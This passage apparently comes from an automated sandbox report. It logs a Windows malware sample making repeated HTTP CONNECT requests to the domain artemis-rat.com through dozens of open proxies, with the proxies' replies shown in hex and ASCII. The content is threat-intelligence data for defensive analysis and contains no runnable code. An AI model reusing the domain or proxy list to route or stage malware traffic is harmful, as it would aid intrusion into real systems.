                                              X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                              Connection: keep-alive
                                              Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                              Data Ascii: ERR_ACCESS_DENIED


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              75192.168.2.449959203.218.172.22580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.240299940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.558695078 CET326INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              76192.168.2.449913103.105.126.18847284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.242902040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.022921085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.194302082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.569824934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              77192.168.2.44996091.189.177.18831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.242997885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.563258886 CET1286INHTTP/1.1 403 Forbidden
                                              Server: squid/5.7
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3628
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from lb1
                                              X-Cache-Lookup: NONE from lb1:3128
                                              Via: 1.1 lb1 (squid/5.7)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              78192.168.2.450111104.25.135.170807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.252486944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.406748056 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              79192.168.2.449965195.211.219.14755557284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.272670031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.006783009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.069307089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.285449028 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              80192.168.2.45001313.37.89.20131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.279782057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.575895071 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              81192.168.2.450129104.238.111.107263057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.282084942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              82192.168.2.449969110.74.221.4880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.289007902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.022932053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.069344997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              83192.168.2.45016045.12.31.104807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.300183058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.454242945 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              84192.168.2.450083199.58.185.941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.304466963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              85192.168.2.450071174.75.211.22241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.304493904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              86192.168.2.450161162.159.247.57807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.307146072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.468295097 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              87192.168.2.45001138.54.16.97807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.325967073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.670907021 CET176INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Length: 19
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              88192.168.2.45013638.162.25.6131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.341669083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.753350973 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              89192.168.2.450029148.72.212.18327927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.341892958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.053674936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.084964037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.257289886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              90192.168.2.450158142.54.226.21441457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.343277931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              91192.168.2.45014338.162.28.7931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.350292921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.760615110 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              92192.168.2.450009103.49.202.252807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.353055000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              93192.168.2.450214162.159.242.158807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.414603949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.576736927 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              94192.168.2.45015735.79.120.24231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.414669037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:17.678220034 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              95192.168.2.450115119.196.168.183807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.414719105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              96192.168.2.450068147.139.140.74807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:17.416016102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:25.758374929 CET104INHTTP/1.0 200 Connection Established
                                              Proxy-agent: Apache/2.4.37 (Alibaba Cloud Linux) OpenSSL/1.1.1k


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              97192.168.2.450216172.67.3.98807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
